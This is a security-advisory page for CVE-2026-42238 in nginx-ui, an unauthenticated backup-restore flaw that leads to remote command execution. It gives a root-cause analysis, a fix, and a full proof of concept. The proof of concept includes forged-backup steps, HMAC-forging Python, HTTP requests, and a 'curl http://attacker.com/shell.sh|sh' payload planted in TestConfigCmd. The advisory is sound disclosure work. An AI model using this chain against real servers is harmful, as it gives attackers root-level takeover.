        return execShell(settings.NginxSettings.TestConfigCmd)
    }
    sbin := GetSbinPath()
    if sbin == "" {
        return execCommand("nginx", "-t")
    }
    return execCommand(sbin, "-t")
}

File: internal/nginx/exec.go (L12-28)

func execShell(cmd string) (stdOut string, stdErr error) {
    var execCmd *exec.Cmd

    if runtime.GOOS == "windows" {
        execCmd = exec.Command("cmd", "/c", cmd)
    } else {
        execCmd = exec.Command("/bin/sh", "-c", cmd)
    }

    execCmd.Dir = GetNginxExeDir()
    bytes, err := execCmd.CombinedOutput()
    stdOut = string(bytes)
    if err != nil {
        stdErr = err
    }
    return
}

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.0 (Critical)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/0xJacky/nginx-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42238"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T17:03:43Z",
    "nvd_published_at": "2026-05-04T21:16:32Z",
    "severity": "CRITICAL"
  },
  "details": "**Product:** nginx-ui\n**Repository:** `0xJacky/nginx-ui` (branch: `dev`)\n**Vulnerability Class:** Authentication Bypass \u2192 Arbitrary File Write \u2192 OS Command Injection\n**Affected Component:** `POST /api/restore`\n\n---\n\n## 1. Vulnerability Summary\n\nnginx-ui exposes a backup restore endpoint (`POST /api/restore`) that is **completely unauthenticated** during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application\u0027s configuration file (`app.ini`) and SQLite database. Because the attacker controls the restored `app.ini`, they can inject an arbitrary OS command into the `TestConfigCmd` setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui \u2014 typically `root` in Docker deployments.\n\nThe 10-minute unauthenticated window resets on every process restart, making this exploitable not only on initial deployments but on any restart event (container restart, upgrade, health-check-triggered restart).\n\n---\n\n## 2. Root Cause Analysis\n\n### 2.1 The Restore Route Is Registered Without Authentication\n\n`backup.InitRouter` is called on the `root` group, which carries only `IPWhiteList()` middleware \u2014 no `AuthRequired()`: [1](#2-0) \n\nThe route definition: [2](#2-1) \n\n### 2.2 The `authIfInstalled` Guard Has a Time-Bounded Bypass\n\nThe only authentication guard on the restore route is `authIfInstalled`: [3](#2-2) \n\nIt calls `AuthRequired()` only when `InstallLockStatus() || IsInstallTimeoutExceeded()` is true. Both conditions are false on a fresh install within the first 10 minutes: [4](#2-3) \n\n- `InstallLockStatus()` returns `false` because `JwtSecret` is `\"\"` on a fresh install and `SkipInstallation` defaults to `false`.\n- `IsInstallTimeoutExceeded()` returns `false` for the first 10 minutes after `startupTime` is set in `init()`.\n\nWhen both are `false`, `authIfInstalled` calls `ctx.Next()` with **zero authentication**.\n\n### 2.3 The `EncryptedForm` Middleware Is Not a Security Barrier\n\nThe `EncryptedForm()` middleware between `authIfInstalled` and `RestoreBackup` is **optional** \u2014 it only activates if the request includes an `encrypted_params` field. If that field is absent, it calls `c.Next()` immediately: [5](#2-4) \n\nAn attacker sends a plain `multipart/form-data` request without `encrypted_params` and the middleware is a no-op.\n\n### 2.4 The Attacker Controls the AES Key Used to Verify the Backup\n\nThe restore handler accepts the AES key and IV directly from the attacker via the `security_token` form field: [6](#2-5) \n\nThe manifest integrity check derives its HMAC signing key **from the attacker-supplied AES key**: [7](#2-6) \n\nSince the attacker crafts the backup and supplies the key, they can produce a valid HMAC signature for any manifest content they choose. The integrity check is self-referential and provides no security against a crafted backup.\n\n### 2.5 Restore Overwrites `app.ini` and the SQLite Database Unconditionally\n\nWhen `restore_nginx_ui=true`, `restoreNginxUIConfig` directly copies files from the backup onto disk with no content validation: [8](#2-7) \n\n### 2.6 Restored `TestConfigCmd` Is Executed as a Shell Command\n\nAfter restore, `risefront.Restart()` is called, reloading `app.ini`: [9](#2-8) \n\nOn the next call to `TestConfig()`, the value of `TestConfigCmd` from the restored `app.ini` is passed verbatim to `/bin/sh -c`: [10](#2-9) [11](#2-10) \n\n---\n\n## 3. Attack Prerequisites\n\n| Requirement | Notes |\n|---|---|\n| Network access to nginx-ui port | Default: 9000/tcp |\n| Target is a fresh install | `JwtSecret` is empty in `app.ini` |\n| Within 10 minutes of last process start | Window resets on every restart |\n| IP not blocked by `IPWhiteList` | Default config has no IP whitelist |\n\nThe 10-minute window is not a meaningful mitigation in practice. Docker containers restart frequently due to health checks, upgrades, and orchestrator rescheduling. Any restart resets `startupTime` via `init()`, reopening the window.\n\n---\n\n## 4. Step-by-Step Proof of Concept\n\n### Step 1 \u2014 Confirm the installation window is open\n\n```http\nGET /api/install HTTP/1.1\nHost: target:9000\n```\n\nExpected response confirming vulnerability:\n```json\n{\"lock\": false, \"timeout\": false}\n```\n\n### Step 2 \u2014 Craft the malicious backup\n\nThe backup format (derived from `internal/backup/backup.go`) is:\n\n```\nbackup-TIMESTAMP.zip          \u2190 outer ZIP (unencrypted)\n\u251c\u2500\u2500 manifest.json             \u2190 JSON manifest\n\u251c\u2500\u2500 manifest.sig              \u2190 HMAC-SHA256 of manifest.json\n\u251c\u2500\u2500 nginx-ui.zip              \u2190 AES-CBC encrypted inner ZIP\n\u2514\u2500\u2500 nginx.zip                 \u2190 AES-CBC encrypted inner ZIP\n```\n\n**2a.** Generate a random 32-byte AES key and 16-byte IV.\n\n**2b.** Create the malicious `app.ini` to place inside `nginx-ui.zip`:\n\n```ini\n[app]\nJwtSecret = attacker_chosen_jwt_secret_32chars\n\n[node]\nSecret = attacker_chosen_node_secret\n\n[nginx]\nTestConfigCmd = curl http://attacker.com/shell.sh|sh\n```\n\n**2c.** Create a SQLite database (`nginx-ui.db`) with a known bcrypt hash for the admin user (optional \u2014 the node secret alone grants full API access).\n\n**2d.** Package `app.ini` and `nginx-ui.db` into `nginx-ui.zip`. Package an empty or minimal `nginx.zip`.\n\n**2e.** Encrypt both ZIPs with AES-256-CBC using your key and IV.\n\n**2f.** Compute SHA-256 hashes and sizes of the encrypted ZIPs. Build `manifest.json`:\n\n```json\n{\n  \"schema\": 1,\n  \"created_at\": \"20260421-120000\",\n  \"version\": \"2.0.0\",\n  \"files\": [\n    {\"name\": \"nginx-ui.zip\", \"sha256\": \"\u003chash\u003e\", \"size\": \u003csize\u003e},\n    {\"name\": \"nginx.zip\",    \"sha256\": \"\u003chash\u003e\", \"size\": \u003csize\u003e}\n  ]\n}\n```\n\n**2g.** Compute the HMAC-SHA256 signature of `manifest.json` using the signing key derived as:\n\n```python\nimport hashlib, hmac\ncontext = b\"nginx-ui-backup-signing-v1:\"\nsigning_key = hashlib.sha256(context + aes_key).digest()\nsig = hmac.new(signing_key, manifest_bytes, hashlib.sha256).hexdigest()\n```\n\n**2h.** Assemble the outer ZIP containing `manifest.json`, `manifest.sig`, `nginx-ui.zip`, `nginx.zip`.\n\n### Step 3 \u2014 Upload the malicious backup (no authentication required)\n\n```http\nPOST /api/restore HTTP/1.1\nHost: target:9000\nContent-Type: multipart/form-data; boundary=----Boundary\n\n------Boundary\nContent-Disposition: form-data; name=\"backup_file\"; filename=\"evil.zip\"\nContent-Type: application/zip\n\n[crafted backup bytes]\n------Boundary\nContent-Disposition: form-data; name=\"security_token\"\n\n\u003cbase64(aes_key)\u003e:\u003cbase64(aes_iv)\u003e\n------Boundary\nContent-Disposition: form-data; name=\"restore_nginx_ui\"\n\ntrue\n------Boundary--\n```\n\nExpected response (HTTP 200):\n```json\n{\"nginx_ui_restored\": true, \"nginx_restored\": false, \"hash_match\": true}\n```\n\nnginx-ui calls `risefront.Restart()` 2 seconds later, loading the attacker\u0027s `app.ini`.\n\n### Step 4 \u2014 Trigger RCE using the restored node secret\n\nAfter the restart (wait ~3 seconds):\n\n```http\nPOST /api/nginx/test HTTP/1.1\nHost: target:9000\nX-Node-Secret: attacker_chosen_node_secret\n```\n\nnginx-ui executes:\n```sh\n/bin/sh -c \"curl http://attacker.com/shell.sh|sh\"\n```\n\nThe attacker now has a reverse shell running as the nginx-ui process user (typically `root` in Docker).\n\n---\n\n## 5. Impact\n\n- **Confidentiality:** Full read access to all nginx configurations, TLS private keys, database contents, and secrets stored in `app.ini`.\n- **Integrity:** Arbitrary modification of all nginx configurations and nginx-ui application state.\n- **Availability:** Complete denial of service; nginx and nginx-ui can be stopped or misconfigured.\n- **Scope:** OS-level code execution. In Docker deployments (the primary distribution method), nginx-ui runs as root, giving the attacker full host access if the container has host mounts or privileged mode.\n\n---\n\n## 6. Affected Versions\n\nAll versions of nginx-ui where `authIfInstalled` is used as the sole authentication guard on `POST /api/restore`. The vulnerability is present in the current `dev` branch.\n\n---\n\n## 7. Recommended Fix\n\n**Primary fix** \u2014 Require authentication unconditionally on the restore endpoint. The \"allow restore during initial setup\" design rationale does not justify unauthenticated access to a file-write primitive:\n\n```go\n// api/backup/router.go\nfunc InitRouter(r *gin.RouterGroup) {\n    r.GET(\"/backup\", middleware.AuthRequired(), CreateBackup)\n    r.POST(\"/restore\", middleware.AuthRequired(), middleware.EncryptedForm(), RestoreBackup)\n}\n```\n\nIf restore-during-setup is a required feature, it should be gated on a one-time setup token generated at startup and printed to the server console (similar to how Jenkins handles initial setup), not on a time window.\n\n**Secondary fix** \u2014 Validate the content of restored `app.ini` before writing it to disk. Specifically, `TestConfigCmd`, `ReloadCmd`, and `RestartCmd` should be rejected or stripped from any externally-supplied backup.\n\n---\n\n## 8. Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-21 | Vulnerability identified via source code review |\n| \u2014 | Vendor notification (pending) |\n| \u2014 | CVE assignment (pending) |\n\n### Citations\n\n**File:** router/routers.go (L61-70)\n```go\n\troot := r.Group(\"/api\", middleware.IPWhiteList())\n\t{\n\t\tpublic.InitRouter(root)\n\t\tcrypto.InitPublicRouter(root)\n\t\tuser.InitAuthRouter(root)\n\t\tlicense.InitRouter(root)\n\n\t\tsystem.InitPublicRouter(root)\n\t\tsystem.InitSelfCheckRouter(root)\n\t\tbackup.InitRouter(root)\n```\n\n**File:** api/backup/router.go (L9-16)\n```go\n// authIfInstalled requires auth if system is installed\nfunc authIfInstalled(ctx *gin.Context) {\n\tif system.InstallLockStatus() || system.IsInstallTimeoutExceeded() {\n\t\tmiddleware.AuthRequired()(ctx)\n\t} else {\n\t\tctx.Next()\n\t}\n}\n```\n\n**File:** api/backup/router.go (L18-25)\n```go\nfunc InitRouter(r *gin.RouterGroup) {\n\t// Backup always requires authentication (contains sensitive data)\n\tr.GET(\"/backup\", middleware.AuthRequired(), CreateBackup)\n\n\t// Restore requires auth only after installation\n\t// This allows restoring backup during initial setup\n\tr.POST(\"/restore\", authIfInstalled, middleware.EncryptedForm(), RestoreBackup)\n}\n```\n\n**File:** api/system/install.go (L27-34)\n```go\nfunc InstallLockStatus() bool {\n\treturn settings.NodeSettings.SkipInstallation || cSettings.AppSettings.JwtSecret != \"\"\n}\n\n// IsInstallTimeoutExceeded checks if installation time limit (10 minutes) is exceeded\nfunc IsInstallTimeoutExceeded() bool {\n\treturn time.Since(startupTime) \u003e 10*time.Minute\n}\n```\n\n**File:** internal/middleware/encrypted_params.go (L69-75)\n```go\n\t\t// Check if encrypted_params field exists\n\t\tencryptedParams := c.Request.FormValue(\"encrypted_params\")\n\t\tif encryptedParams == \"\" {\n\t\t\t// No encryption, continue normally\n\t\t\tc.Next()\n\t\t\treturn\n\t\t}\n```\n\n**File:** api/backup/restore.go (L35-70)\n```go\n\tsecurityToken := c.PostForm(\"security_token\") // Get concatenated key and IV\n\t// Get backup file\n\tbackupFile, err := c.FormFile(\"backup_file\")\n\tif err != nil {\n\t\tcosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrBackupFileNotFound, err.Error()))\n\t\treturn\n\t}\n\n\t// Validate security token\n\tif securityToken == \"\" {\n\t\tcosy.ErrHandler(c, backup.ErrInvalidSecurityToken)\n\t\treturn\n\t}\n\n\t// Split security token to get Key and IV\n\tparts := strings.Split(securityToken, \":\")\n\tif len(parts) != 2 {\n\t\tcosy.ErrHandler(c, backup.ErrInvalidSecurityToken)\n\t\treturn\n\t}\n\n\taesKey := parts[0]\n\taesIv := parts[1]\n\n\t// Decode Key and IV from base64\n\tkey, err := base64.StdEncoding.DecodeString(aesKey)\n\tif err != nil {\n\t\tcosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrInvalidAESKey, err.Error()))\n\t\treturn\n\t}\n\n\tiv, err := base64.StdEncoding.DecodeString(aesIv)\n\tif err != nil {\n\t\tcosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrInvalidAESIV, err.Error()))\n\t\treturn\n\t}\n```\n\n**File:** api/backup/restore.go (L126-132)\n```go\n\tif restoreNginxUI {\n\t\tgo func() {\n\t\t\ttime.Sleep(2 * time.Second)\n\t\t\t// gracefully restart\n\t\t\trisefront.Restart()\n\t\t}()\n\t}\n```\n\n**File:** internal/backup/manifest.go (L156-163)\n```go\nfunc deriveBackupSigningKeyFromAESKey(aesKey []byte) ([]byte, error) {\n\tif len(aesKey) == 0 {\n\t\treturn nil, ErrInvalidAESKey\n\t}\n\n\tsum := sha256.Sum256(append([]byte(manifestKeyContext), aesKey...))\n\treturn sum[:], nil\n}\n```\n\n**File:** internal/backup/restore.go (L458-484)\n```go\n// restoreNginxUIConfig restores nginx-ui configuration files\nfunc restoreNginxUIConfig(nginxUIBackupDir string) error {\n\t// Get config directory\n\tconfigDir := filepath.Dir(cosysettings.ConfPath)\n\tif configDir == \"\" {\n\t\treturn ErrConfigPathEmpty\n\t}\n\n\t// Restore app.ini to the configured location\n\tsrcConfigPath := filepath.Join(nginxUIBackupDir, \"app.ini\")\n\tif err := copyFile(srcConfigPath, cosysettings.ConfPath); err != nil {\n\t\treturn err\n\t}\n\n\t// Restore database file if exists\n\tdbName := settings.DatabaseSettings.GetName()\n\tsrcDBPath := filepath.Join(nginxUIBackupDir, dbName+\".db\")\n\tdestDBPath := filepath.Join(configDir, dbName+\".db\")\n\n\t// Only attempt to copy if database file exists in backup\n\tif _, err := os.Stat(srcDBPath); err == nil {\n\t\tif err := copyFile(srcDBPath, destDBPath); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n```\n\n**File:** internal/nginx/nginx.go (L25-36)\n```go\nfunc TestConfig() (stdOut string, stdErr error) {\n\tmutex.Lock()\n\tdefer mutex.Unlock()\n\tif settings.NginxSettings.TestConfigCmd != \"\" {\n\t\treturn execShell(settings.NginxSettings.TestConfigCmd)\n\t}\n\tsbin := GetSbinPath()\n\tif sbin == \"\" {\n\t\treturn execCommand(\"nginx\", \"-t\")\n\t}\n\treturn execCommand(sbin, \"-t\")\n}\n```\n\n**File:** internal/nginx/exec.go (L12-28)\n```go\nfunc execShell(cmd string) (stdOut string, stdErr error) {\n\tvar execCmd *exec.Cmd\n\n\tif runtime.GOOS == \"windows\" {\n\t\texecCmd = exec.Command(\"cmd\", \"/c\", cmd)\n\t} else {\n\t\texecCmd = exec.Command(\"/bin/sh\", \"-c\", cmd)\n\t}\n\n\texecCmd.Dir = GetNginxExeDir()\n\tbytes, err := execCmd.CombinedOutput()\n\tstdOut = string(bytes)\n\tif err != nil {\n\t\tstdErr = err\n\t}\n\treturn\n}\n```",
  "id": "GHSA-4pvg-prr3-9cxr",
  "modified": "2026-05-06T17:03:44Z",
  "published": "2026-05-06T17:03:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42238"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/0xJacky/nginx-ui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Nginx-UI is Vulnerable to Unauthenticated Remote Code Execution via Backup Restore"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42238 (GCVE-0-2026-42238)

FKIE_CVE-2026-42238

GHSA-4PVG-PRR3-9CXR

1. Vulnerability Summary

2. Root Cause Analysis

2.1 The Restore Route Is Registered Without Authentication

2.2 The authIfInstalled Guard Has a Time-Bounded Bypass

2.3 The EncryptedForm Middleware Is Not a Security Barrier

2.4 The Attacker Controls the AES Key Used to Verify the Backup

2.5 Restore Overwrites app.ini and the SQLite Database Unconditionally

2.6 Restored TestConfigCmd Is Executed as a Shell Command

3. Attack Prerequisites

4. Step-by-Step Proof of Concept

Step 1 — Confirm the installation window is open

Step 2 — Craft the malicious backup

Step 3 — Upload the malicious backup (no authentication required)

Step 4 — Trigger RCE using the restored node secret

5. Impact

6. Affected Versions

7. Recommended Fix

8. Timeline

Citations

Tags

Sightings

Nomenclature

2.2 The `authIfInstalled` Guard Has a Time-Bounded Bypass

2.3 The `EncryptedForm` Middleware Is Not a Security Barrier

2.5 Restore Overwrites `app.ini` and the SQLite Database Unconditionally

2.6 Restored `TestConfigCmd` Is Executed as a Shell Command